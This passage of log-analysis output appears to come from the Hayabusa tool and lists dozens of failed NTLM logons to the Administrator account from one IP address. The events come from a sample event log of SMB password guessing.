2016-09-20 01:52:35.422 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Rs5gYGs6JBf2yV1J | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:35.475 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 67hYMvtmbrmv5LHn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:35.521 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gtV42zBnWwRCLfJS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:35.569 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jnaPNm28FvbFfM8L | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:35.620 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oCEvKO14gPFHAZIA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:35.661 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iJJyXCm1YOI2uIAS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:35.717 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MNAScx4qMKxCJQdU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:35.752 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BKTHsNA29ZnPHCHQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:35.796 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CjvAb3sjN0PM8my4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:35.836 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wYQ6HuRSMh8DXzMf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:35.885 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SZgejUxgojDE1kR3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:35.929 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2L4yO411OUnkRGWQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:35.986 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: O3mGCNGFML75P7w4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:36.041 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6CBslPz31UACz0wR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:36.077 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: F4Y8V0wB6unpmFXA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:36.125 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aXSbx81GD6dYgHtv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:36.172 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dWbnppJfJ0Ll9oLW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:36.201 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eoUjizV5iXImPGTe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:36.245 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HHNG9oylnT46IObg | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:36.297 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1LUeAisNPQULjD2t | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:36.422 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2sB5MlRw4Ox1OWdN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:36.491 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3WaklWtKd8QByH8M | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:36.557 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Nzvyy6CUk43SVxZW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:36.601 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xeolvnD92qP1dJPO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:36.636 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KDvRwPbu6yQH2pEf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:36.681 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vxKdofXKKkCLn2n6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:36.730 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IkO9p50Q9iFolbmb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:36.780 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: p01SZCA784xmPMe2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:36.825 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XKaI3FHBbBXvVsES | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:36.873 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mmUk6sW8QreDIZZ5 | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:36.916 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: k0w9SSWaaTX7chM9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:36.961 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 46vgsyX5Wxn2rupf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:37.006 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PV8628a8GNKoFyzM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:37.047 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mksBFEFzkC08dB4o | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:37.080 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: U6QlHT6Bp63JDehd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:37.116 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tRj4fxcRY0Esegl6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:37.157 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dj6zQjZwGEBo0zNt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:37.202 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: imfY1T2VMoaqDSUd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:37.243 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qvPP8UYn9fLpRYl4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:37.289 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rFTGQ5tzNI5k58cK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:37.329 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: F8Zj3g1WiTLx8OlJ | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:37.364 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: x2Lr6j8Qt4xEmZZF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:37.409 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BeDRsguCovO47lKm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:37.445 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KqrDyaFTewMPSzD9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:37.489 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nBVMAki1Ghpknf6p | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:37.535 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pXKhNUmBUQBTyeNM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:37.596 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: d1g9TVwsweaBfZgE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:37.645 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kWymb6ucohaBB60b | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:37.747 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LjL0zwlZofVuWhGC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:37.793 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nxsdzkJdnaZs5eKL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:37.844 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PR6EpKvbqMeoQlKI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:37.889 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OZ3LMTtsVNI1gRO2 | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:37.929 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 75bNeXwYSZPhJdJ7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:37.981 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lH6TVXSqJb1qLd3t | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:38.021 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: edDWye6c2UhKznR6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:38.057 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AxKUl1lynGY1ectn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:38.094 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vI5yUgukPBVRorJI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:38.142 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MmR29QcBKMGVQ8rB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:38.177 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: b7luV5GfiT0v0h7D | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:38.217 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yA7pIDFgQbLIInqs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:38.257 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 84g2gO0253Ut4O1O | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:38.296 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DRkFX9WTAhBZ8jc8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:38.337 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WuoQAi4k3XZPaf4O | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:38.393 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KjKMhCnbR0uFT0av | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:38.442 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1lfwqPB0AgTfIOt4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:38.486 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mJuG26pQzdjUQael | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:38.528 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GXwEziYTA3DkkFVq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:38.576 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CHr6dirvkT8B9ZVs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:38.623 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: B5eSMLiF4BsfY3xN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:38.657 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 64ISDuFRhR6cFYVQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:38.693 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hcprXytyuBw380XY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:38.733 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BxfQWiSIhZYxwNjh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:38.772 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FcL982boDelzeyzK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:38.817 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NBAAjRdaR8U0tqt7 | IP Addr: 192.168.198.149 | AuthPackage: 
